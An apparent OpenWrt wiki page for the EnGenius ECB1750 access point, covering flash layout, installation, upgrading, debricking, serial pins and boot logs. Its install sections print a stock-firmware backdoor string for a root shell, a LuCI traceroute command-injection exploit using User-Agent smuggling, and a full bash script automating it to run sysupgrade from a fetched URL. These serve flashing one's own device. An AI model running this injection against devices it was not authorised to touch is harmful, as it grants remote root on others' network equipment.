EnGenius ECB1750
Supported Versions
Hardware Highlights
Installation
Flash Layout
ECB1750 FLASH LAYOUT | |||||||
---|---|---|---|---|---|---|---|
Layer 0 | spi0.0: MX25l12805D 16384KiB | ||||||
L1 MTDBlock | MTD0 | MTD1 | MTD7 | MTD5 | MTD6 | ||
L1 name | u-boot | u-boot-env | firmware 15680 | userconfig | art | ||
L1 start | 0x00000000 | 0x000000040000 | 0x000000050000 | 0x000000fa0000 | 0x000000ff0000 | ||
L1 end | 0x000000040000 | 0x000000050000 | 0x000000fa0000 | 0x000000ff0000 | 0x000001000000 | ||
Layer 2 | MTD2 | MTD 3 | MTD4 | ||||
L2 name | kernel | rootfs | |||||
L2 start | 0x000000050000 | 0x0000001b0000 | |||||
L2 end | 0x0000001b0000 | 0x000000fa0000 | |||||
L2 size in KiB | 1408k | 14272k | |||||
mountpoint | / | ||||||
Filesystem | mini_fo/overlayfs | ||||||
Layer 3 | rootfs_data | ||||||
L3 start | 0x000000430000 | ||||||
L3 end | 0x000000fa0000 | ||||||
Size in KiB | 256k | 64k | 1408k | 2560k | 10688k | 1024k | 64k |
name | u-boot | u-boot-env | kernel | rootfs | rootfs_data | userconfig | art |
mountpoint | none | none | none | /rom | /overlay | none | none |
filesystem | none | none | none | SquashFS | JFFS2 | none | none |
OEM firmware backdoor
Some EnGenius devices have a backdoor built in to drop from their limited CLI into a root shell. More information can be found in this gist, but in this section there will be instructions to install OpenWRT.
First make sure that telnet is enabled. This can be done on the Web UI under the “Management” section and then specifically the “Advanced” page. On the same page, enable SSH, this is not relevant for now, but will be needed later.
After that, connect to the device using telnet. Then login using the credentials that work on the Web UI. You will be dropped into a command prompt that looks somewhat like the following:
*** Hi admin, welcome to use cli(V-1.9.11) *** ---========= Commands Help =========--- stat -- Status sys -- System wless2 -- 2.4G-Wireless wless5 -- 5G-Wireless mgmt -- Management tree -- Tree help -- Help reboot -- Reboot logout -- Logout ecb1750>
At this point insert the string “1d68d24ea0d9bb6e19949676058f1b93” and press enter. After that “ecb1750>” turns into “>”. Then execute the command “login”. Ater that you will be dropped into the root shell for the OEM firmware:
ecb1750>1d68d24ea0d9bb6e19949676058f1b93 > login BusyBox v1.19.4 (2017-11-01 14:24:44 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ----------------------------------------------------- ATTITUDE ADJUSTMENT (ECB1750_1200_v4_REPEATER, 4841772) ----------------------------------------------------- * 1/4 oz Vodka Pour all ingredients into mixing * 1/4 oz Gin tin with ice, strain into glass. * 1/4 oz Amaretto * 1/4 oz Triple sec * 1/4 oz Peach schnapps * 1/4 oz Sour mix * 1 splash Cranberry juice ----------------------------------------------------- 3.0.0 ************************************************************************ Firmware Version : 3.0.0.4 Build Date : 2017-11-01 ************************************************************************
Then change the password using the “passwd” command.
At this point it should be possible to connect over ssh, but at the time of writing (2024-06) the default OpenSSH package in many distro's will not support the outdated algorithms the older Dropbear version uses by default. To remedy this you can add “-oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss” to the ssh command you execute to connect to the device.
This will still drop you into the CLI program. The next step is to remove this automatic invocation. For this you can use vim to edit the dropbear service at “/etc/init.d/dropbear” and remove the part that invokes the CLI program. This will turn the following snippet from:
[...] # l) login path cli_enable="$(uci get cfg_cli.@cli[0].cli_enable)" 2>/dev/null [ "${cli_enable}" -eq 1 ] && append args "-l ${PROG_CLI}" # C) banner file config_get val "${section}" BannerFile [ -f "${val}" ] && append args "-b ${val}" [...]
Into:
[...] # l) login path cli_enable="$(uci get cfg_cli.@cli[0].cli_enable)" 2>/dev/null [ "${cli_enable}" -eq 1 ] # C) banner file config_get val "${section}" BannerFile [ -f "${val}" ] && append args "-b ${val}" [...]
After restarting dropbear using “/etc/init.d/dropbear restart” ssh will accept the password you set earlier.
At that point it's possible to copy over the sysupgrade bin you fetch from the firmware selector. When using “scp”, be sure to add the key algorithm flags from earlier and to add the “-O” (dash Capital O) flag to make scp use legacy methods to copy over the file:
$ scp -r -O -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss openwrt-23.05.3-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin root@192.168.1.1:/tmp/openwrt.bin root@192.168.1.1's password: openwrt-23.05.3-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin 100% 6208KB 2.9MB/s 00:02
Then connect back over ssh and execute a sysupgrade with the file that you just copied over. Do not mind the “X not found” errors. The installation should still succeed:
$ ssh root@192.168.1.1 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss root@192.168.1.1's password: BusyBox v1.19.4 (2017-11-01 14:24:44 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ----------------------------------------------------- ATTITUDE ADJUSTMENT (ECB1750_1200_v4_REPEATER, 4841772) ----------------------------------------------------- * 1/4 oz Vodka Pour all ingredients into mixing * 1/4 oz Gin tin with ice, strain into glass. * 1/4 oz Amaretto * 1/4 oz Triple sec * 1/4 oz Peach schnapps * 1/4 oz Sour mix * 1 splash Cranberry juice ----------------------------------------------------- 3.0.0 ************************************************************************ Firmware Version : 3.0.0.4 Build Date : 2017-11-01 ************************************************************************ root@ECB1750:~# sysupgrade -F -n -v /tmp/openwrt.bin BusyBox v1.19.4 (2017-11-01 14:24:44 CST) multi-call binary. Usage: time [-v] PROG ARGS Run PROG, display resource usage when it exits -v Verbose /sbin/sysupgrade: line 19: hour: not found /sbin/sysupgrade: line 20: minute: not found /sbin/sysupgrade: line 21: second: not found Sending TERM to remaining processes ... udhcpc ifplugd lighttpd dnsmasq avahi-daemon ntpd iperf iperf locator snmpd sh syslogd klogd hotplug2 ubusd netifd Sending KILL to remaining processes ... Switching to ramdisk... Performing system upgrade... Unlocking firmware ... Writing from <stdin> to firmware ... Upgrade completed Rebooting system...
After that, the device should boot up into OpenWRT and you will be able to reach it using a static ip at 192.168.1.1 within the 192.168.1.0/24 subnet.
OEM firmware exploitation
I have used several methods of installing openwrt onto the ECB1750 (writing the flash over spi with a programmer, tftp, web ui exploitation). All of these methods are pretty generic and straight forward except oddly enough the most accessible one.
I am going to start by outlining how the exploit I found works. It is a pretty normal command injection vuln for the most part. The stock firmware is already running an Attitude Adjustment build of OpenWrt along with the proprietary Qualcomm Atheros drivers. Which in of itself is fine... but for whatever reason they dulled down LuCI to the point where the AP is barely usable as one. Knowing that the device is running OpenWrt helps with understanding the structure of the stock firmware. I just had to find a way to poke at it...
Digging around I found that most if not all of the tools listed under “Management>Tools” on the stock firmware filters the user input using client side js. Starting from the 'Traceroute' tab I captured a request from pressing the 'Start' button using the Firefox inspector and then I copied it out as a curl command which gave me:
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1' \ -H 'Host: 192.168.1.164' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \ -H 'Accept-Language: en-US,en;q=0.5' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' \ -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' \ -H 'Connection: keep-alive'
When this is executed it returns something like this:
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets 1 127.0.0.1 0.039 ms
Now we have a way to poke at this function from the command like without javascript gumming up the works. Lets tack a command onto the end of the address to see what happens.
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env)' \ -H 'Host: 192.168.1.164' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \ -H 'Accept-Language: en-US,en;q=0.5' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' \ -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' \ -H 'Connection: keep-alive'
Which returns something like:
traceroute: bad address '127.0.0.1GATEWAY_INTERFACE=CGI/1.1 REMOTE_ADDR=192.168.1.30 QUERY_STRING=_=0.19077395883423587 HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0 DOCUMENT_ROOT=/www/ REMOTE_PORT=58438 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 CONTENT_LENGTH=0 SCRIPT_FILENAME=/www/cgi-bin/luci HTTP_HOST=192.168.1.164 REQUEST_URI=/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env) SERVER_SOFTWARE=lighttpd/1.4.30 HTTP_CONNECTION=keep-alive HTTP_COOKIE=sysauth=2ed278385aaf32fb88c85388a86d533b HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5 HTTP_REFERER=http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate PATH_INFO=/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$(env) REDIRECT_STATUS=200 REQUEST_METHOD=GET SERVER_ADDR=0.0.0.0 PWD=/www/cgi-bin SERVER_PORT=80 SCRIPT_NAME=/cgi-bin/luci SERVER_NAME=192.168.1.164'
Sweet, Sweet shell injection...Now what can we do with this? Turns out as-is not much because the server side wont allow any space characters to be passed through the request. This means that 'ls' will execute fine but 'ls -la' will return:
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body> </html>
So what can we do about this? Well...remember before when we issued the 'env' command? Check its output...you might see it... Thats right. The user agent is set as a variable for the executing shell. This means that while the server rejects '../127.0.0.1$(ls -la)' because it contains a space character '../127.0.0.1$($HTTP_USER_AGENT)' will pass just fine.
So lets leverage this to execute 'ls -la' just to see:
curl 'http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' \ -H 'Host: 192.168.1.164' \ -H 'User-Agent: ls -la' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \ -H 'Accept-Language: en-US,en;q=0.5' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Referer: http://192.168.1.164/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' \ -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' \ -H 'Connection: keep-alive'
If that returns something like this:
traceroute: bad address '127.0.0.1drwxr-xr-x 2 root root 27 Aug 11 08:40 . drwxr-xr-x 4 root root 398 Aug 11 08:40 .. -rwxr-xr-x 1 root root 135 Jan 27 2015 luci'
Then you have just successfully leveraged the vulnerability to execute shell code at the level needed to replace the system firmware.
OEM installation using the exploit method
The Manual Way - needs: sysauth, stok (!!)
If you opt for the long way you should read the above section titled “OEM firmware exploitation”. This is purely instructional. We need to complete 3 steps to replace the AP's firmware.
- save the sysupgrade file to “/tmp”.
- run a minimal local webserver with python. Abort with <CTRL>+<C>.
$ cd /tmp $ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... <CTRL>+<C> $
- run 'sysupgrade' and download directly the firmware
curl 'http://192.168.1.10/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' \ -H 'Host: 192.168.1.10' \ -H 'User-Agent: sysupgrade -F -n -v http://192.168.1.10/openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \ -H 'Accept-Language: en-US,en;q=0.5' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Referer: http://192.168.1.10/cgi-bin/luci/;stok=6f6d4ce561d8d2f221e3c41ec4a10447/admin/network/diagnostics?tab=traceroute' \ -H 'Cookie: sysauth=2ed278385aaf32fb88c85388a86d533b' \ -H 'Connection: keep-alive'
The Short Way:
You need a local web server or wan connection.
- Save the sysupgrade file to “/tmp”.
- Run a minimal local webserver with python. Abort with <CTRL>+<C>.
$ cd /tmp $ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... <CTRL>+<C> $
Run this Script and wait a minute to complete sysupgrade/reboot..
$ bash ecb1750.sh (..) $
ecb17250.sh:
#!/bin/bash ################ # Instructions # ################ # # ECB1750 Access Point: 192.168.1.1 (default admin:admin) # client: 192.168.1.10 # # 1.) change login credential ($__USERNAME, $__PASSWORD) and ip address ($__AP_IP) according your access point settings # # 2.) setup a local webserver serving the openwrt sysupgrade file # 2.1) download "openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin" or newer to "/tmp" # 2.2) start a simple webserver on port 8080 (no root privs needed): # $ cd /tmp # $ python -m SimpleHTTPServer 8080 # # 3.) change $__UPGRADE_URI_FILE pointing to your webserver # # 4.) run script.. # $ bash ecb1750.sh # # 5.) wait a minute to complete sysupgrade and # ########### # Exploit # ########### # # we need to catch the cookie (sysauth) and luci security token (stok) # sysauth and stok are always different strings # # 1.) login onto the webinterface # => http://192.168.1.1/ (full path: http://192.168.1.1/cgi-bin/luci/) # # 2.) afterwards a cookie will be created containing a random string "sysauth=7f105ab35ee7676d14a6ca446fac2c72" - check browser developer tools # # 3.) you will be redirected to "http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/" - we need the stok string # # 4.) under "management" => "tools" you can run traceroute # => http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/network/diag_traceroute/127.0.0.1 # # 5.) add command at the end without whitespaces # => http://192.168.1.1/cgi-bin/luci/;stok=773b0d54a4a14fec324c687e1dd8f61b/admin/network/diag_traceroute/127.0.0.1$(env) # # 6.) use HTTP_USER_AGENT to inject command # __USERNAME="admin" __PASSWORD="admin" __AP_IP=192.168.1.1 __UPGRADE_URI_FILE="http://192.168.1.10:8080/openwrt-ath79-generic-engenius_ecb1750-squashfs-sysupgrade.bin" __COOKIE_FILE="/tmp/.ecb1750.cookie.$$" if [ ! -x /usr/bin/curl ]; then "error: \"curl\" not found."; exit 1; fi # # cookie output: # # # Netscape HTTP Cookie File # # https://curl.haxx.se/docs/http-cookies.html # # This file was generated by libcurl! Edit at your own risk. # # # 192.168.1.1 FALSE /cgi-bin/luci/ FALSE 0 sysauth 7f105ab35ee7676d14a6ca446fac2c72 # # echo "connecting: ${__AP_IP}. username: ${__USERNAME}. password: ${__PASSWORD}." __STOK_AUTH=$( curl --max-time 10 -s -d "username=${__USERNAME}" -d "password=${__PASSWORD}" --cookie-jar "${__COOKIE_FILE}" http://${__AP_IP}/cgi-bin/luci | awk -F\/ '/var\ url/{print $4}' ) if [ -z "${__STOK_AUTH}" ] then echo "error: variable \"__STOK_AUTH\" empty." exit 1 else echo "STOK_AUTH: ${__STOK_AUTH}" fi if [ ! -f "${__COOKIE_FILE}" ] then echo "error: cookie file \"${__COOKIE_FILE}\" empty." exit 1 fi __COOKIE_SYSAUTH=$( awk -F\ '/^'$__AP_IP'/{print $7}'\; < "${__COOKIE_FILE}" ) if [ -z "${__COOKIE_SYSAUTH}" ] then echo "error: variable \"__COOKIE_SYSAUTH\" empty." exit 1 else echo "COOKIE_SYSAUTH: ${__COOKIE_SYSAUTH}" fi echo "running command: sysupgrade -F -n -v ${__UPGRADE_URI_FILE}" curl 'http://192.168.1.1/cgi-bin/luci/'${__STOK_AUTH}'/admin/network/diag_traceroute/127.0.0.1$($HTTP_USER_AGENT)' \ -H 'Host: '${__AP_IP}'' \ -H 'User-Agent: sysupgrade -F -n -v '${__UPGRADE_URI_FILE}'' \ -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \ -H 'Accept-Language: en-US,en;q=0.5' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Cookie: sysauth='${__COOKIE_SYSAUTH}'' \ -H 'Connection: keep-alive' \ -H 'Referer: http://'${__AP_IP}'/cgi-bin/luci/'${__STOK_AUTH}'/admin/network/diagnostics?tab=traceroute' \ rm "${__COOKIE_FILE}"
Upgrading OpenWrt
These are generic instructions. Update with your router's specifics.
LuCI Web Upgrade Process
- Browse to http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/ LuCI Upgrade URL
- Upload image file for sysupgrade to LuCI
- Wait for reboot
Terminal Upgrade Process
If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading:
sysupgrade
mtd
Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing.
sysupgrade
- Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc sysupgrade /tmp/xxx.abc
mtd
If sysupgrade
does not support this router, use mtd
.
- Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc mtd write /tmp/xxx.abc linux && reboot
Debricking
→ generic.debrick
The latest OEM firmware releases are encoded so they will not work for tftp booting.
I have found that v1.0.1.15 and v1.0.2 are not encoded so they should work.
If you want to use the latest OEM over tftp you need to compile the senao header program from the GPL src tree under GPL_OPENWRT/SENAO/package/senao-image-header.
Once you have that build you can decode the firmware with:
$./header_x86 -a -s ECB-1750-v1.2.3.30.bin -d ECB-1750-v1.2.3.30.bin.decoded MD5 check OK! header: Return OK
Failsafe mode
Basic configuration
→ Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.
Specific Configuration
OEM Network interfaces
The default OEM firmware network configuration is:
Interface Name | Description | Default configuration |
---|---|---|
br-lan | LAN | 192.168.1.1 |
wlan0 | 5GHz WiFi | Disabled |
wlan1 | 2.4GHz WiFi | Disabled |
OpenWrt Network interfaces
The default OpenWRT update firmware network configuration is:
Interface Name | Description | Default configuration |
---|---|---|
br-lan | LAN | 192.168.1.1 |
wlan0 | 5GHz WiFi | Disabled |
wlan1 | 2.4GHz WiFi | Disabled |
Buttons
→ hardware.button on howto use and configure the hardware button(s). Here, we merely name the buttons, so we can use them in the above Howto.
The EnGenius ECB1750 has the following buttons:
BUTTON | Event |
---|---|
EXAMPLE Reset | reset |
Hardware
Info
Opening the case
Note: This will void your warranty!
Remove the single torx screw beside the Kensington lock hole on on the same side of the device as the power and ethernet ports.
The rest of the housing is held in place by clips built into the plastic.
I find the simplest way to deal with these is to use a prying implement like a flathead screwdriver to LIGHTLY create a gap wide enough to insert a shim (old cd-r's and/or credit card size plastic are great for this).
Then just go around the device until all of the clips are shimmed and the plastic housing should just lift off.
Serial
From left to right in the picture: VCC(3.3v), GND, TX, RX
Do not connect VCC.
Serial connection parameters for EnGenius ECB1750 | EXAMPLE 115200, 8N1 |
---|
Hardware mods
NOTE: As a beginner, you really should inform yourself first about soldering in general, and then obtain some practical experience, before doing anything to your device that you'll later regret!
Bootlogs
u-boot environment
ath> printenv bootargs=console=ttyS0,115200 root=31:02 rootfstype=jffs2 init=/sbin/init mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),6336k(rootfs),1408k(uImage),8256k(mib0),64k(ART) bootcmd=bootm 0x9f050000 bootdelay=2 baudrate=115200 ethaddr=88:DC:96:5F:08:0C ipaddr=192.168.1.1 serverip=192.168.1.10 sn=175256815 hw_ver=1.0.0 pro_id=000 country=000 domain=1 op_mode=3 wanaddr=00:aa:bb:cc:dd:11 wlanaddr=00:aa:bb:cc:dd:12 hw_id=0101006D debug=0 fwaddr=00:aa:bb:cc:dd:14 athaddr=88:DC:96:5F:08:0D app_part=0 oled_on=0 ddwrt_sw=0 snextra=00000000000000000000 language_code=00 service_tag=000000000000000 uboot_ver=1.0.0.1 bundle_ap_mac=00:aa:bb:cc:dd:15 dir= lu=tftp 0x80060000 ${dir}u-boot.bin&&erase 0x9f000000 +$filesize&&cp.b $fileaddr 0x9f000000 $filesize lf=tftp 0x80060000 ${dir}ap135${bc}-jffs2&&erase 0x9f050000 +0x630000&&cp.b $fileaddr 0x9f050000 $filesize lk=tftp 0x80060000 ${dir}vmlinux${bc}.lzma.uImage&&erase 0x9f680000 +$filesize&&cp.b $fileaddr 0x9f680000 $filesize factory_boot=tftp 0x3000000 ap.bin && bootm 0x3000000 stdin=serial stdout=serial stderr=serial ethact=eth0 Environment size: 1078/65532 bytes ath>
OEM bootlog
ECB1200_1750 - Scorpion 1.0DRAM: sri Scorpion 1.0 ath_ddr_initial_config(200): (32bit) ddr2 init tap = 0x00000003 Tap (low, high) = (0x4, 0x1a) Tap values = (0xf, 0xf, 0xf, 0xf) 128 MB Top of RAM usable for U-Boot at: 88000000 Reserving 216k for U-Boot at: 87fc8000 Reserving 192k for malloc() at: 87f98000 Reserving 44 Bytes for Board Info at: 87f97fd4 Reserving 36 Bytes for Globata at: 87f97fb0 Reserving 128k for boot params() at: 87f77fb0 Stack Pointer at: 87f77f98 Now running in RAM - U-Boot at: 87fc8000 Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18 flash size 16MB, sector count = 256 Flash: 16 MB *** Warning *** : 2nd PCIe WLAN Module not found !!! In: serial Out: serial Err: serial Net: ath_gmac_enet_initialize... athrs_sgmii_res_cal: cal value = 0x1 Fetching MAC Address from 0x87feb810 ath_gmac_enet_initialize: reset mask:c02200 Scorpion ----> AR8035 PHY * AR8035 PHY init : cfg1 0xf cfg2 0x7135 eth0: 88:dc:96:39:d9:a1 ATHR8035_PHY: Phy 5, Neg Success ATHR8035_PHY: unit 0 phy addr 5 eth0 up eth0 Setting 0x18116290 to 0x58b1a14f Hit any key to stop autoboot: 0 ## Booting image at 9f050000 ... Image Name: MIPS OpenWrt Linux-3.3.8 Created: 2015-08-11 8:46:21 UTC Image Type: MIPS Linux Kernel Image (lzma compressed) Data Size: 10 Bytes = 1016.1 kB Load Address: 80060000 Entry Point: 80060000 Verifying Checksum at 0x9f050040 ...OK Uncompressing Kernel Image ... OK No initrd ## Transferring control to Linux (at address 80060000) ... ## Giving linux memsize in bytes, 134217728 Starting kernel ... [ 0.000000] Linux version 3.3.8 (root@localhost.localdomain) (gcc version 4.6.3 20120201 (prerelease) (Linaro GCC 4.6-2012.02) ) #1 Tue Aug 11 16:45:47 CST 2015 [ 0.000000] bootconsole [early0] enabled 0.000000] CPU revision is: 00019750 (MIPS 74Kc) [ 0.000000] SoC: Qualcomm Atheros QCA9558 rev 0 0.000000] Clocks: CPU:720.000MHz, DDR:600.000MHz, AHB:200.000MHz, Ref:40.000MHz [ 0.000000] Determined physical RAM map: 0.000000] memory: 08000000 @ 00000000 (usable) [ 0.000000] Initrd not found or empty - disabling initrd [ 0.000000] Zone PFN ranges: [ 0.000000] Normal 0x00000000 -> 0x00008000 [ 0.000000] Movable zone start PFN for each node [ 0.00 Early memory PFN ranges [ 0.000000] 0: 0x00000000 -> 0x00008000 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 32512 [ 0.000000] Kernel command line: board=ECB1750 console=ttyS0,115200 mtdparts=spi0.0:256k(u-boot),64k(u-boot-env),1(kernel),14272k(rootfs),320k(userconfig),64k(art),15680k@0x50000(firmware) rootfstype=squashfs,jffs2 ntrd [ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes) [ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes) [ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes) [ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. [ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes [ 0.000000] Writing ErrCtl register=00000000 [ 0.000000] Readback ErrCtl register=00000000 [ 0.000000] Memory: 126296k/131072k available (2216k kernel code, 4776k reserved, 581k data, 212k init, 0k highmem) [ 0.000000] SLUB: Genslabs=9, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 [ .000000] NR_IRQS:51 [ 0.000000] Calibrating delay loop... 358.80 BogoMIPS (lpj=1794048) [ 0.060000] pid_max: default: 32768 minimum: 301 [ 0.060000] Mount-cache hash table entries: 512 [ 0.070000] Initialized recycle list for cpu 0. [ 0.070000] NET: Registered protocol family 16 [ 0.080000] gpiochip_add: registered GPIOs 0 to 23 on device: ath79 [ 0.080000] MIPS: machine is Senao ECB1750 [ 0.090000] registering PCI controller with io_map_base unset [ 0.100000] ar724x-pci ar724x-pci.1: PCIe link is down [ 0.100000] registering PCI controller with io_map_base unset [ 0.310000] bio: create slab <bio-0> at 0 [ 0.320000] PCI host bridge to bus 0000:00 [ 0.320000] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff] [ 0.330000] pci_bus 0000:00: root bus resource [io 0x0000] [ 0.330000] pci:00:00.0: invalid calibration data [ 0.340000] pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit] [ 0.340000] pci 0000:00:00.0: BAR 6: assigned [mem 0x10200000-0x1020ffff pref] [ 0.350000] PCI host bridge to bus 0000:01 [ 0.350000] pci_bus 0000:01: root bus resource [x12000000-0x13ffffff] [ 0.360000] pci_bus 0000:01: root bus resource [io 0x0001] [ 0.360000] pci 0000:00:00.0: using i for pin 1 [ 0.370000] Switching to clocksource MIPS [ 0.370000] NET: Registered protocol family 2 [ 0.380000] IP route cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.380000] TCP established hash table entries: 4096 (order: 3, 32768 bytes) [ 0.390000] TCP bind hash table entries: 4096 (order: 2, 16384 bytes) [ 0.390000] TCP: Hash tablonfigured (established 4096 bind 4096) [ 0.400000] TCP reno registered [ 0.400000] UDP hash taentries: 256 (order: 0, 4096 bytes) [ 0.410000] UDP-Lite hash table entries: 256 (order: 0, 4096 ) [ 0.410000] NET: Registered protocol family 1 [ 0.430000] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 0.430000] JFFS2 version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc. [ 0.440000] msgmni has been set to 246 [ 0.450000] io scheduler noop registered [ 0.450000] io scheduler deadline registered (default) [ 0.460000] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled [ 0.480000] serial8250.0: ttyS0 at MMIO 0x18020000 (irq = 11) is a 16550A [ 0.490000] console [ttyS0] enabled, bootconsole disabled [ 0.490000] console [ttyS0] enabled, bootconsole disabled [ 0.500000] m25p80 spi0.0: found mx25l12805d, expected m25p80 [ 0.510000] m25p80 spi0.0: mx25l12805d (16384 Kbytes) [ 0.510000] 7 cmdlinepart partitions found on MTD device spi0.0 [ 0.520000] Creating 7 MTD partitions on "spi0.0": [ 0.530000] 0x000000000000-0x000000040000 : "u-boot" [ 0.530000] 0x000000040000-0x000000050000 : "u-boot-env" [ 0.540000] 0x000000050000-0x0000001b0000 : "kernel" [ 0.540000] 0x0000001b0000-0x000000fa0000 : "rootfs" [ 0.550000] mtd: partition "rootfs" set to be root filesystem [ 0.560000] mtd: partition "rootfs_data" created automatically, ofs=810000, len=790000 [ 0.560000] 0x000000810000-0x000000fa0000 : "rootfs_data" [ 0.570000] 0x000000fa0000-0x000000ff0000 : "userconfig" [ 0.580000] 0x000000ff0000-0x000001000000 : "art" [ 0.580000] 0x000000050000-0x000000fa0000 : "firmware" [ 0.590000] /proc/Lan_Led created [ 0.610000] ag71xx_mdio: probed [ 0.610000] eth0: Atheros AG71xx at 0xb9000000, irq 4 [ 1.170000] ag71xx ag71xx.0: eth0: connected to PHY at ag71xx-mdio.0:05 [uid=004dd072, driver=Generic PHY] [ 1.180000] GACT probability on [ 1.180000] Mirror/redirect action on [ 1.180000] u32 classifier [ 1.190000] Performance counters on [ 1.190000] input device check on [ 1.190000] Actions configured [ 1.200000] ip_tables: (C) 2000-2006 Netfilter Core Team [ 1.200000] TCP bic registered [ 1.210000] TCP cubic registered [ 1.210000] TCP westwood registered [ 1.210000] TCP highspeed registered [ 1.220000] TCP hybla registered [ 1.220000] TCP htcp registered [ 1.220000] TCP vegas registered [ 1.230000] TCP veno registered [ 1.230000] TCP scalable registered [ 1.230000] TCP lp registered [ 1.240000] TCP yeah registered [ 1.240000] TCP illinois registered [ 1.240000] NET: Registered protocol family 17 [ 1.250000] 